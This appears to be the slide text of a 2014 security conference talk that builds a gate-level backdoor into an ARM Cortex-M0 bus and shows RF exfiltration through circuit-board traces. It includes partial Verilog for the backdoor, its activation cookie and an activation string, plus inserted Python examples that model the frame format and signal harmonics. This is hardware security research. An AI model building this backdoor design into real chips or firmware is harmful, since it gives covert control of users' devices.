Deep-Submicron Backdoor
Syscan Singapore 2014
Alfredo Ortega, Groundworks Technologies
Malicious hardware is a mature topic but previous research has focused almost exclusively on theoretical applications. In this article, practical implementations of gate-level backdoors will be presented using the Verilog hardware description language, then simulated and finally synthesized using freely available deep sub-micron (45-180 nm) standard cells, resulting in a backdoored latest-generation ARM CPU, suitable for fabrication and massive deployment.


Slides

  1. Deep-Submicron Backdoor. Syscan Singapore 2014. Alfredo Ortega, Groundworks Technologies.
  2. Agenda
     - Deep-Submicron VLSI: technology smaller than 350 nm
     - Hardware backdoors
     - History
     - Non-gov examples
     - Unintentional backdoors
     - Why create a CPU backdoor
     - Malproxy bus backdoor (demo)
     - RFI exfiltration backdoor (demo)
     - Questions
  3. Introduction
     - "Hardware": overused.
     - Not hardware: regular user-mode backdoors, "Reflections on Trusting Trust", weakening of protocols/cryptography (see the RSA Dual EC DRBG saga). Very practical, particularly dangerous, easy to catch.
     - Layer diagram: Software (user-mode, kernel-mode, hypervisor), Firmware, Microcode, Physics, annotated with Regular Rootkits and Hardware.
  4. "Hardware" backdoors?
     - Still in software/firmware.
     - Specially dangerous if massive (adversary can use them).
     - More expensive to detect (no AVs).
     - Layer diagram: Software (user-mode, kernel-mode, hypervisor), Firmware, Microcode, Physics, annotated with Regular Rootkits, BIOS Rootkits, SMM Rootkits, AMT Rootkits, and Hardware: our talk.
  5. History: The Great Seal Bug
     - Also called "The Thing"; one of the first covert listening devices (found in 1945).
     - Designed by Leon Theremin.
     - Sound-modulated resonant cavity: no external power.
  6. Clipper chip
     - Developed and promoted by the U.S. NSA; announced in 1993.
     - Skipjack algorithm, key escrow mechanism.
     - Cryptographer Matt Blaze published a serious vulnerability.
     - Entirely defunct by 1996.
  7. NSA ANT division catalog
     - NSA ANT insert catalog: a catalog of hardware backdoors.
     - Developed from 2005 to 2010.
     - Leaked by Edward Snowden.
  8. Non-gov examples (legit backdoors)
     - Intel Anti-Theft technology.
     - Network equipment lawful interception.
     - Research and academia: IEEE Hardware-Oriented Security and Trust (HOST), NYU-Poly Embedded Systems Challenge. Too many to cite; very advanced.
     - "Stealthy Dopant-Level Hardware Trojans", Becker et al.
  9. Unintentional backdoors
     - World-accessible reflashing mechanisms (BIOS, micro-SD, pendrives, etc.).
     - Most firmware backdoors.
     - Silicon: ProASIC3 backdoor (Skorobogatov et al.).
     - JTAG interfaces.
     - Convenience/security tradeoff.
  10. Rationale
     - No real backdoor on silicon to analyze; all examples are theoretical. Let's make a real one.
     - Our approach: real silicon ASIC design; generic and simple payload, trivial to locate; no effort on stealth; ready for massive deployment.
     - Two basic attacks: 1. bus intrusion (MALPROXY); 2. data exfiltration (RiFt).
  11. MALPROXY
     - Diagram: Malicious Bus Proxy sitting between the CPU, the bus and RAM.
     - Bus backdoor: a small malicious state machine.
     - Peek/Poke functionality.
     - AMBA-compatible; CPU/software independent.
     - Real system (ARM Cortex-M0 DesignStart).
     - FPGA and silicon-ready.
     - Easy to detect.
  12. MALPROXY: High-level design
     - Constantly monitoring the AMBA bus. If a command is correctly parsed, take control of the bus and modify memory.
     - Only two commands are needed for execution control: Peek mem32 and Poke mem32. If the software/architecture is known, the Poke command alone is enough.
     - State sequence: search for the activation cookie, read command, read address, read data, execute command.
  13. MALPROXY: Verilog (RTL excerpt; the slide's listing line numbers are removed)

         // -------------------------------------------------
         // Trivial rootkit coprocessor unit
         // -------------------------------------------------
         reg [5:0] RTKState;
         reg [8:0] RTKCmd;
         reg [3:0] RTKCount;
         reg       RTKDeviated;   // bus-takeover flag; declared here, not shown on the slide

         `define RTK_FIND_START 5'h0
         `define RTK_FIND_CMD   5'h1
         `define RTK_FIND_DATA  5'h2
         `define RTK_FIND_ADDR  5'h3
         `define RTK_EXEC       5'h4
         `define RTK_EXEC2      5'h5
         `define RTK_END        5'h6
         `define RTK_CMD_WRITE  "W"
         `define RTK_CMD_READ   "R"

         // 56-bit initial cookie
         // i.e. memcpy "\x78\x56\x34\x12R\xaa\x55\xaa";
         `define RTK_COOKIE_1 32'h12345678
         `define RTK_COOKIE_2 24'h434241
         `define RTK_COOKIE_3 24'h2D2D2D   // "---"

         // One state transition per AHB clock; HRESETn is the active-low reset
         always @(posedge HCLK or negedge HRESETn)
         begin
           if (!HRESETn) begin             // Reset
             RTKState    <= `RTK_FIND_START;
             RTKDeviated <= 0;
           end
           else begin
             case (RTKState)
               `RTK_FIND_START:            // Find first part of cookie on the write-data bus
                 if (HWDATA == `RTK_COOKIE_1)
                   RTKState <= `RTK_FIND_CMD;
               `RTK_FIND_CMD:              // Load second part of cookie and single-byte command
                 begin
                   if (HWDATA[31:8] == `RTK_COOKIE_2) begin
                     RTKCmd   <= HWDATA[7:0];
                     RTKState <= `RTK_FIND_DATA;
                     RTKCount <= 0;
                   end
                   else RTKState <= `RTK_FIND_START;
                 end
               // RTK_FIND_DATA, RTK_FIND_ADDR, RTK_EXEC, RTK_EXEC2 and RTK_END
               // are not shown on the slide; the excerpt ends here.
               default: RTKState <= `RTK_FIND_START;
             endcase
           end
         end
  14. MALPROXY: Logic
     - Malproxy alone, 180 nm, 100 MHz: 476 cells, 1.032 mW, 0.019 mm².
     - Total (with Cortex-M0): 9526 cells, 14.7 mW, 0.38 mm².
     - Logic diagram (incomplete).
  15. MALPROXY: ASIC
     - Implementation: ARM AMBA-bus compatible, 100% Verilog, FPGA+ASIC compatible.
     - Two processes: OSU TSMC 180 nm, 6-layer; Nangate 45 nm, 10-layer.
     - https://github.com/Groundworkstech/Submicron (the ARM core requires a separate license).
     - Placed and routed, ARM + MalProxy, 180 nm, 6 metal layers.
  16. MALPROXY. Demo 1: 45 nm 10-layer structure.
  17. MALPROXY, 45 nm 10-layer
     - SoC Encounter digital flow (Cadence); GDSII output.
     - Visible code-style differences.
  18. MALPROXY command encoding

         `define RTK_COOKIE_1  32'h12345678
         `define RTK_COOKIE_2  24'h434241
         `define RTK_COOKIE_3  24'h2D2D2D
         `define RTK_CMD_WRITE "W"
         `define RTK_CMD_READ  "R"

     Frame, as a sequence of 32-bit bus words:
     - [RTK_COOKIE_1]
     - [RTK_COOKIE_2 + Command]
     - [RTK_COOKIE_3 + DATA] x 4
     - [RTK_COOKIE_3 + ADDR] x 4
     - [RTK_COOKIE_3 + EXEC]: executes the command
     EXEC disconnects the CPU from the bus and CLK for 2 clocks total.
  19. MALPROXY: Activation. Example activation code (*):

         #include <stdio.h>
         #include <string.h>
         #include "ch.h"   /* ChibiOS kernel API: TRUE, chSchDoRescheduleBehind() */

         /* Inside the main thread. The 40-byte frame is: cookie 1, cookie 2 + 'W' (poke),
            four data words "A---", four address words; no EXEC word is appended here. */
         char buf[40];
         char *str = "\x78\x56\x34\x12WABCA---A---A---A---\x00---\x00---\x0a---\x65---";
         while (TRUE) {
             puts("Main thread: hello world");
             memcpy(buf, str, 40);        /* -- Backdoor activates here */
             chSchDoRescheduleBehind();
         }

     (*) Activation can be triggered by any other means, e.g. network transfer, DMA, etc.
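A software model of the MALPROXY frame format and its bus-side state machine, added here as an example and not the slides' Verilog or activation code: it encodes a Peek/Poke frame from the command-encoding slide and replays the state machine over the 40-byte activation string above; run over a captured bus or memory trace, the same routine is the signature scan that makes the design easy to detect. Assumptions not given on the slides: the EXEC command byte (placeholder 'X'), little-endian assembly of the DATA/ADDR bytes, and a return to FIND_START whenever a cookie check fails.

```python
"""MALPROXY frame model (added example, not the slides' code): encode a Peek/Poke frame and
replay the bus-side state machine.  ASSUMPTIONS not on the slides: EXEC command byte ('X'
placeholder), little-endian DATA/ADDR byte order, return to FIND_START on any failed cookie."""
import struct
RTK_COOKIE_1 = 0x12345678   # whole first word
RTK_COOKIE_2 = 0x434241     # bits [31:8] of the command word ("ABC" on the bus)
RTK_COOKIE_3 = 0x2D2D2D     # bits [31:8] of data/addr/exec words ("---")
RTK_CMD_WRITE, RTK_CMD_READ = ord("W"), ord("R")
RTK_CMD_EXEC = ord("X")     # ASSUMPTION: placeholder, the slide does not give this byte


def encode_frame(cmd, data, addr, exec_byte=RTK_CMD_EXEC):
    """Bus words of one transaction: cookie1, cookie2+cmd, 4 data, 4 addr, cookie3+exec."""
    words = [RTK_COOKIE_1, (RTK_COOKIE_2 << 8) | cmd]
    for value in (data, addr):
        words += [(RTK_COOKIE_3 << 8) | b for b in value.to_bytes(4, "little")]
    return words + [(RTK_COOKIE_3 << 8) | exec_byte]


def decode_stream(words):
    """Run the state machine over HWDATA words; returns (completed frames, state, bytes so far)."""
    state, cmd, buf, done = "FIND_START", None, [], []
    for w in words:
        if state == "FIND_START":
            state = "FIND_CMD" if w == RTK_COOKIE_1 else state
        elif state == "FIND_CMD":
            if w >> 8 == RTK_COOKIE_2:
                cmd, buf, state = w & 0xFF, [], "FIND_DATA"
            else:
                state = "FIND_START"
        elif state in ("FIND_DATA", "FIND_ADDR"):
            if w >> 8 != RTK_COOKIE_3:
                state = "FIND_START"
                continue
            buf.append(w & 0xFF)
            state = {4: "FIND_ADDR", 8: "EXEC"}.get(len(buf), state)
        elif state == "EXEC":           # EXEC word: CPU is taken off the bus for 2 clocks
            if w >> 8 == RTK_COOKIE_3:
                done.append((chr(cmd), int.from_bytes(bytes(buf[:4]), "little"),
                             int.from_bytes(bytes(buf[4:]), "little")))
            state = "FIND_START"
    return done, state, buf


def words_from_bytes(blob):
    """Split a little-endian byte string (such as the slide's C string) into 32-bit words."""
    return [w for (w,) in struct.iter_unpack("<I", blob)]


# Constructed input: the slide's 40-byte activation string, which stops before the EXEC word.
SLIDE_STRING = b"\x78\x56\x34\x12WABCA---A---A---A---\x00---\x00---\x0a---\x65---"
```

Replaying SLIDE_STRING leaves the machine parked in EXEC with command 'W', data bytes 41 41 41 41 and address bytes 00 00 0a 65 collected, which is exactly the pattern a trace scanner would flag.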
  20. MALPROXY. Demo 2: backdoor activation.
  21. RiFt: Data exfiltration
     - We are not limited to standard communication (TCP/IP, etc.); many side channels are available.
     - We chose forced RFI using PCB traces; even LED traces can be used.
     - Target: Altera DE1 FPGA dev board.
     - Reception with an RTL-SDR, up to 5 meters with the standard receiver antenna.
     - Figure: DE1 PCB.
  22. RiFt: Harmonics
     - How does it work? CPUs and FPGAs usually can't emit RF directly.
     - They can switch a pin on/off very fast (100 MHz).
     - This produces a square wave with infinite sinusoidal harmonics.
     - We can use any of those harmonic frequencies.
     - For now, just simple modulation (AM, on/off).
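Which harmonics of a toggled pin land in a receiver's band, added here as an example that is not from the slides: the Fourier series of a rectangular wave at rate f0 and duty cycle d has components at n*f0 with amplitude proportional to |sin(n*pi*d)|/n, so a 50% square wave at 100 MHz puts odd harmonics at 300, 500, 700 MHz and the 700 MHz used in the measurement slide is the 7th harmonic at about -17 dBc. It generalizes to other duty cycles, where even harmonics appear; the default band (24 to 1766 MHz) is a typical RTL-SDR tuning range and an assumption, not a figure from the slides.

```python
"""Harmonics of a fast-toggled pin as RF carriers (added example, not from the slides)."""
import math

# Typical RTL-SDR (R820T tuner) range in Hz; an assumption, not a figure from the slides.
RTL_SDR_BAND = (24e6, 1766e6)


def harmonic_levels(f_pin_hz, duty=0.5, band=RTL_SDR_BAND):
    """List (frequency, level in dBc) for every non-null harmonic n*f_pin inside `band`.

    A 0/A rectangular wave with duty cycle d has harmonic amplitudes
    c_n = (2A / (n*pi)) * |sin(n*pi*d)|; levels are relative to the
    fundamental (n = 1) of the same wave.  Harmonics whose sine term is
    zero (even n at 50% duty, multiples of 4 at 25% duty) are omitted."""
    f_lo, f_hi = band
    c1 = abs(math.sin(math.pi * duty))
    out = []
    n = max(1, math.ceil(f_lo / f_pin_hz))
    while n * f_pin_hz <= f_hi:
        s = abs(math.sin(n * math.pi * duty))
        if s > 1e-9:                               # skip exact nulls of the envelope
            out.append((n * f_pin_hz, 20 * math.log10(s / (n * c1))))
        n += 1
    return out


def nearest_harmonic(f_pin_hz, f_target_hz, duty=0.5, band=RTL_SDR_BAND):
    """Harmonic closest to a wanted carrier, e.g. 700 MHz from a 100 MHz toggle gives n = 7."""
    freq, level = min(harmonic_levels(f_pin_hz, duty, band),
                      key=lambda fl: abs(fl[0] - f_target_hz))
    return round(freq / f_pin_hz), freq, level


if __name__ == "__main__":
    # The slide's case: a pin toggled at 100 MHz, received with an RTL-SDR.
    for freq, level in harmonic_levels(100e6):
        print(f"{freq / 1e6:7.1f} MHz  {level:6.1f} dBc")
    print("nearest to 700 MHz:", nearest_harmonic(100e6, 700e6))
```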
  23. RiFt: Harmonics (figure).
  24. RiFt: Simulation. Numerical Electromagnetics Code (xnec2c): gain vs. frequency / 3D radiation pattern.
  25. RiFt: Simulation. Numerical Electromagnetics Code (xnec2c) data file:

         CM NEC Input File
         CM Monopole radius 0.001m, length 17m above perfect ground
         CM Monopole pcb trace 0.0001m, length 17m above perfect ground
         CM Excitation at base by a 1V source
         CM GW 9, 8, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00800E+00, 0.00000E+00, 1.00000E-03
         CM Antenna geometry
         CE
         GW 1, 8, 0.00000E+00, 0.00000E+00, 0.00100E+00, 0.10000E+00, 0.00000E+00, 0.00100E+00, 1.00000E-03
         GW 2, 8, 0.00000E+00, 0.00100E+00, 0.00100E+00, 0.10000E+00, 0.01000E+00, 0.00100E+00, 1.00000E-03
         GW 3, 8, 0.00000E+00, 0.00200E+00, 0.00100E+00, 0.10000E+00, 0.02000E+00, 0.00100E+00, 1.00000E-03
         GW 4, 8, 0.00000E+00, 0.00300E+00, 0.00100E+00, 0.10000E+00, 0.03000E+00, 0.00100E+00, 1.00000E-03
         GW 5, 8, 0.00000E+00, 0.00400E+00, 0.00100E+00, 0.10000E+00, 0.04000E+00, 0.00100E+00, 1.00000E-03
         GW 6, 8, 0.00000E+00, 0.00500E+00, 0.00100E+00, 0.10000E+00, 0.05000E+00, 0.00100E+00, 1.00000E-03
         GW 7, 8, 0.00000E+00, 0.00600E+00, 0.00100E+00, 0.10000E+00, 0.06000E+00, 0.00100E+00, 1.00000E-03
         GW 8, 8, 0.00000E+00, 0.00700E+00, 0.00100E+00, 0.10000E+00, 0.07000E+00, 0.00100E+00, 1.00000E-03
         GE
         FR 0, 1000, 0, 0, 100, 1
         EX 0 1 1 10 1
         RP 0, 19, 36, 1000, 0, 0, 10, 10
         EN
  26. RiFt. Demo 3: antenna simulation.
  27. RiFt: Measurements. Measurement setup (figure).
  28. RiFt: Measurements. Measurement results. Plot: 700 MHz RiFt power measurement, dBSM vs. azimuth (polar plot, -40 to 40 dB scale).
  29. RiFt: Directionality. DE1 board LED 1-8 PCB traces at 700 MHz, order is 1,3,2,4,7,8: a parasitic antenna array showing Yagi-like directionality.
  30. RiFt. Demo 4: RiFt in action!
  31. The end. Thanks! Any questions? The Deep-Submicron Backdoor project was created by researchers Fernando Russ and Alfredo Ortega (Twitter: @ortegaalfredo) from Groundworks Technologies, Buenos Aires, Argentina.
